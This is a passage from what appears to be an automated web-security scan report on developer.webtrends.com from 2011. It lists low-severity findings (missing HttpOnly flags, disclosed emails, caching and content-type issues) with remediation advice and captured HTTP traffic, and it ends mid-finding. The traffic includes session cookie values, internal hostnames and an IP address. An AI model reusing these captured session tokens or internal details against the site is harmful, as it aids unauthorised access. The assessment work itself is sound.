Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745; jive.recentHistory.-1=332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:35:38 GMT
Server: Apache-Coyote/1.1
X-JAL: 13319
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=332c333734303b332c333739323b332c333033373b332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b; Expires=Wed, 13-Apr-2011 15:35:38 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=13379419 t=1300116925632043
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 76033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. https://developer.webtrends.com/community/dc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /community/dc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/dc HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/message/2426
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745; jive.recentHistory.-1=332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:35:34 GMT
Server: Apache-Coyote/1.1
X-JAL: 1158
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=332c333739323b332c333033373b332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b; Expires=Wed, 13-Apr-2011 15:35:33 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=1191939 t=1300116933431777
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 125492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.2. https://developer.webtrends.com/community/dc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /community/dc/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/dc/ HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/index.jspa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:33:46 GMT
Server: Apache-Coyote/1.1
X-JAL: 2180
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031303b; Expires=Wed, 13-Apr-2011 15:33:44 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=2225670 t=1300116824146362
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 125516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.3. https://developer.webtrends.com/message/2426  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /message/2426

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/2426 HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/community/dc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745; jive.recentHistory.-1=31342c323031303b

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:35:12 GMT
Server: Apache-Coyote/1.1
X-JAL: 1173
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=332c333739323b332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b; Expires=Wed, 13-Apr-2011 15:35:11 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=1191732 t=1300116911084303
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 121597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.4. https://developer.webtrends.com/people/jouni  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /people/jouni

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/jouni HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/message/2426
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745; jive.recentHistory.-1=332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:35:34 GMT
Server: Apache-Coyote/1.1
X-JAL: 3113
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=332c333739323b332c333033373b332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b; Expires=Wed, 13-Apr-2011 15:35:34 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=3131779 t=1300116931660033
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Length: 77095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.5. https://developer.webtrends.com/people/patrickatcircus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /people/patrickatcircus

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/patrickatcircus HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/message/2426
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745; jive.recentHistory.-1=332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:35:38 GMT
Server: Apache-Coyote/1.1
X-JAL: 13319
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=332c333734303b332c333739323b332c333033373b332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b; Expires=Wed, 13-Apr-2011 15:35:38 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=13379419 t=1300116925632043
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 76033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

5. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


5.1. https://developer.webtrends.com/community/dc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /community/dc

Issue detail

The following email address was disclosed in the response:

Request

GET /community/dc HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/message/2426
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745; jive.recentHistory.-1=332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:35:34 GMT
Server: Apache-Coyote/1.1
X-JAL: 1158
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=332c333739323b332c333033373b332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b; Expires=Wed, 13-Apr-2011 15:35:33 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=1191939 t=1300116933431777
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 125492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:developer@webtrends.com">developer@webtrends.com</a>
...[SNIP]...

5.2. https://developer.webtrends.com/community/dc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /community/dc/

Issue detail

The following email address was disclosed in the response:

Request

GET /community/dc/ HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/index.jspa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:33:46 GMT
Server: Apache-Coyote/1.1
X-JAL: 2180
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031303b; Expires=Wed, 13-Apr-2011 15:33:44 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=2225670 t=1300116824146362
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 125516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:developer@webtrends.com">developer@webtrends.com</a>
...[SNIP]...

5.3. https://developer.webtrends.com/opensearch.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /opensearch.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /opensearch.xml HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:33:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 4
Content-Type: application/opensearchdescription+xml;charset=UTF-8
Vary: Accept-Encoding
X-JSL: D=5571 t=1300116816284719
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 1043

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>Developer Network</ShortName>
<Description>Search Developer Network</Descr
...[SNIP]...
<Contact>developer@webtrends.com</Contact>
...[SNIP]...

6. Cacheable HTTPS response  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /opensearch.xml

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /opensearch.xml HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:33:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 4
Content-Type: application/opensearchdescription+xml;charset=UTF-8
Vary: Accept-Encoding
X-JSL: D=5571 t=1300116816284719
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 1043

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>Developer Network</ShortName>
<Description>Search Developer Network</Descr
...[SNIP]...

7. Multiple content types specified  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /4.5.5/resources/scripts/gen/2ff8c47344fe11038c6576620c2f6c0e.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /4.5.5/resources/scripts/gen/2ff8c47344fe11038c6576620c2f6c0e.js HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/message/2426
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745; jive.recentHistory.-1=332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:35:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Mon, 14 Mar 2011 10:00:23 GMT
ETag: "1d24c8d-637a4-49e6e614fed4b"
Accept-Ranges: bytes
Cache-Control: max-age=315360000
Expires: Thu, 11 Mar 2021 15:35:11 GMT
Vary: Accept-Encoding
X-JSL: D=17201 t=1300116911173609
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/javascript
Content-Length: 407460

jive.ext.y._sliders_on=true;jive.ext.y._sliders=new jive.ext.y.HashTable();jive.ext.y.ySlider=function(b,f,a){var d=new Array();var c=this;this.hash=0;this.name=a;this.moving=false;if(!$obj(f)||f==nul
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />';E.iframeHTML+='<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />';if(m.relaxedDomain){E.iframeHTML+='<script type="text/javascript">
...[SNIP]...

8. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.webtrends.com
Path:   /themePath/developer/images/favicon.ico

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /themePath/developer/images/favicon.ico HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Mar 2011 15:33:37 GMT
Server: Apache-Coyote/1.1
X-JAL: 1
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
X-JSL: D=2376 t=1300116817971028
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Length: 1119


<html>
<head>
<title>The page can't be found (404)</title>

<style type="text/css">
body {
background-color: #e3e3e3;
color: #333;
font-family: Lucida Grande, Arial, Helvetica, sans-
...[SNIP]...

9. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


9.1. https://developer.webtrends.com/opensearch.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://developer.webtrends.com
Path:   /opensearch.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain XML.

Request

GET /opensearch.xml HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:33:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 4
Content-Type: application/opensearchdescription+xml;charset=UTF-8
Vary: Accept-Encoding
X-JSL: D=5571 t=1300116816284719
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 1043

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>Developer Network</ShortName>
<Description>Search Developer Network</Descr
...[SNIP]...

9.2. https://developer.webtrends.com/view-favorite-activity.jspa  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://developer.webtrends.com
Path:   /view-favorite-activity.jspa

Issue detail

